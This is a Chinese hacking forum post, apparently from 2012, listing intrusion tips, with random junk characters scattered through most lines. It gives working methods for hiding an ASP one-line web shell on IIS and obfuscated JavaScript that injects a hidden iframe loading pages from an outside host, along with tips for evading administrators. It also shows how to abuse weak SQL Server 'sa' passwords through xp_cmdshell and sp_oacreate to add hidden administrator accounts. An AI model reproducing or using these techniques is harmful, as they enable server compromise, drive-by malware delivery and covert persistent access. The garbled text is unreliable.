' M) k9 s8 i# G* e5 {, q3 `53、隐藏ASP后门的两种方法) }; y+ u( x M9 F% ^: \$ V! \
1、建立非标准目录:mkdir images..\
" L2 F$ d& M# S/ u: p1 f: ]拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
M* u6 Q# M9 |. B通过web访问ASP木马:http://ip/images../news.asp?action=login, w4 X$ W# Y5 U! z
如何删除非标准目录:rmdir images..\ /s p) T9 M' W/ O$ H5 s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
8 A @) m. [' P- i7 r4 Qmkdir programme.asp
$ h/ w/ E8 E- T; N: d新建1.txt文件内容:<!--#include file=”12.jpg”-->
7 h/ j# \8 K9 i9 I) y2 Z新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件6 k, p4 a- w/ Z% e5 J, @1 F
attrib +H +S programme.asp
0 k$ N _! X/ N* V1 W$ y1 X通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
. U$ N0 q1 w7 e2 w% m
" X2 _3 g$ i& C/ N54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
: x! s: ]; v0 O然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
' i+ @6 Z u8 i- g7 L3 h4 s
" d' b7 Q4 P: a2 O$ V55、JS隐蔽挂马' V& q7 U9 g2 K- z( z/ X
1.5 F' \0 _# d% y( |
var tr4c3="<iframe src=ht";/ c( D* C3 I: Z2 y& q: M' Q* x$ J
tr4c3 = tr4c3+"tp:/";
0 ~6 V" K i4 S& k, |tr4c3 = tr4c3+"/ww";
# t+ U+ d5 W1 D3 n0 ztr4c3 = tr4c3+"w.tr4";
2 G, s3 R3 C9 C- c' z% etr4c3 = tr4c3+"c3.com/inc/m";' T' N7 C, X( g3 N
tr4c3 = tr4c3+"m.htm style="display:none"></i";
5 N( q k- @3 ^6 u1 Ytr4c3 =tr4c3+"frame>'";; B* x1 i/ p$ p( x
document.write(tr4c3);2 m8 U; v# q% _9 ?; S: P" I' @
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
) l- `6 k* G% T! z+ p% f4 R1 {' D- |" x. g1 w3 _
2.
# }2 C. V9 F. Z' v# C7 [, \转换进制,然后用EVAL执行。如* I) O% n$ h6 U" K3 C7 S4 b
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");7 N& d! ]3 ]7 x) e/ z* i
不过这个有点显眼。+ u& X9 `* i' k# r! P7 b7 a
3.
! h2 J* R5 h* Jdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
8 d* n; i* l' {3 q最后一点,别忘了把文件的时间也修改下。
+ \; V0 t4 ~6 A# a! [: h* g" ?0 G+ c4 n# `) |
56.3389终端入侵常用DOS命令0 [, w% F8 A' e' m$ M& a0 A: ~
taskkill taskkill /PID 1248 /t& j/ q& Q' j9 k: a
. S5 r/ B) u3 C6 J' E
tasklist 查进程
. } i4 d# D8 C, V# y: L" L' G/ y% [& q; t3 l% y) p
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
( X/ o2 ~1 p$ _$ S# |4 o6 j Viisreset /reboot
: N& f" r$ t; j/ Ltsshutdn /reboot /delay:1 重起服务器4 a- |3 B- j7 W' F( m3 s" ~
; V& `0 h2 ^: ?& `1 C; r5 l3 g/ h) `
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
% @, H' M: K- U+ M! v9 l' E; k+ g: P2 _$ s0 V% `: d
query user 查看当前终端用户在线情况
- p, R# S1 y: c8 i q) P& C1 B4 C# c# v6 i6 n9 g7 V1 u6 ?( u
要显示有关所有会话使用的进程的信息,请键入:query process *8 c, o0 @( ~8 q- @) V
# K" ^0 h' z! g. p要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
h0 f/ d; W2 z( W" i' t' n! z6 m& b: J9 T/ O
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
, t; [! C0 I+ H; B4 N& {' n& k3 v6 O
* T2 I, _6 p$ F要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02' a* @* y+ V1 H' G" j8 R
/ ?" |* m; \# a: ~命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启% @# j7 _, s l U5 b0 i
: R5 u; d2 v6 v: ^2 k: [! p命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统7 o5 z% o6 M3 r
8 ? k v4 ?) E d命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; Y$ }; l# j: a# m# } T
$ S: M: E. \, F# f, {命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
) u8 c/ j0 v! H: D; T
: l2 O+ W; l! K& J G) p/ h* T! V# `56、在地址栏或按Ctrl+O,输入:8 h) \! F! J, i& r9 S( T
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;# Y+ M' B6 {! w) @1 Z8 l8 U
; o1 k3 m5 }5 S8 {. T% s P
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。( F% N" b6 e/ e" w; y8 m
! y3 Q7 n6 Y* k- W* N* y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,# Z7 p. p. T2 C' Q) |
用net localgroup administrators是可以看到管理组下,加了$的用户的。
- Y/ @9 d. f" T6 \6 j; B8 t+ m% Y1 a0 N6 A( ~# y
58、 sa弱口令相关命令2 u; }# P- |9 Z r
7 N7 `5 E0 j2 w一.更改sa口令方法:; ?7 N, ~1 A; r( `: t* O. Y
用sql综合利用工具连接后,执行命令:$ `9 f8 {# I8 P0 i3 w
exec sp_password NULL,'20001001','sa'% }* N/ h7 O* s# g; s+ ?- F
(提示:慎用!)" e J, T, |: {* F D: o
& T: P+ T% g7 X; V二.简单修补sa弱口令.
7 D1 z' n; n3 v0 l
" m* {- \% _: Y方法1:查询分离器连接后执行:
( }$ a9 R! G% G: kif exists (select * from+ }3 x1 b/ x( o
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" `- ^9 \1 R2 L: P4 _OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
0 L3 }5 O9 P8 b' o6 T1 I; z1 c
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
( W! k# h2 Q, {, W/ y6 Z. d; M h- q
GO' U' N* X$ E5 y! b6 n1 u& m8 L2 ~
# S- K- d& {' z; y
然后按F5键命令执行完毕
2 b9 ^! {! g! G' [" D9 p' l; d) U$ L( ?) \3 ~, ]0 U6 |' J9 D
方法2:查询分离器连接后
, p( E# c" v s8 ^1 r: I第一步执行:use master
9 I% t% s$ Q( M1 m$ M第二步执行:sp_dropextendedproc 'xp_cmdshell'* @& _& x- N I
然后按F5键命令执行完毕
' @6 w. {5 Q( }, j2 v, Y8 y4 N& D, F h+ L; m, f8 w
8 _. n8 E0 g( Y( ]: g三.常见情况恢复执行xp_cmdshell.
, n8 {- |* W# _- P, k) u
5 r: B* f' D @5 E, i. C: N! P. f7 B! A
1 未能找到存储过程'master..xpcmdshell'.1 i" ~2 w: e, U) ~/ O$ @
恢复方法:查询分离器连接后,
# B! d& s. R$ s; A. q3 d第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int( o9 n/ h, k7 Z2 Q! N7 M9 Q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'# t: P2 ^$ Y. s* n* m% t
然后按F5键命令执行完毕# A- @2 c" U! N; d0 G2 C/ G
" `8 x: U" d. ~! K0 }2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)+ v) t6 f8 ?9 a$ D% N
恢复方法:查询分离器连接后,. w4 E7 J' u' P& H# a* C( K
第一步执行:sp_dropextendedproc "xp_cmdshell"
6 j3 e3 W# A9 \) F+ @$ W7 x) D. j第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'" q: s2 G. u' ^& S, p. t4 z
然后按F5键命令执行完毕/ ?4 p- |: u: b' E- z# r j: \ H. S
8 \9 `6 X/ L& ]& Q) U+ c3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。), b# S3 C. |4 v7 S' C: q4 W
恢复方法:查询分离器连接后,
3 u% f! q* z6 x第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
& ?# D3 G& e' s; ?- |" R第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
# _/ p; v/ L! Q3 n% u然后按F5键命令执行完毕
3 q7 D+ N4 {+ y; |6 n5 A
! k9 d& k! P& A m; a5 K/ D; ]四.终极方法.
5 ^4 m. s8 W; j/ w4 x3 u* l如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
. U/ A; W4 }9 ]6 w4 m查询分离器连接后, [2 o# v V, \' y5 e# g K, i; O
2000servser系统:
& H' S6 w0 [ Ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
: Y. F8 e' v1 }1 m# C. Q
( n1 }& B5 r$ L5 I9 v) Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 a8 |0 x5 _% i9 L9 G$ i5 b( T
, \8 W/ b5 k$ ?: ]6 R
xp或2003server系统:
5 `6 k* x* B7 Q L
4 G2 O4 f1 Q9 l+ b5 Qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add') h g1 T" K6 N
2 e/ [2 k/ ~- I* A ndeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: I4 R+ ]1 r q |
发表于 2012-9-15 14:51:03
收藏
支持
反对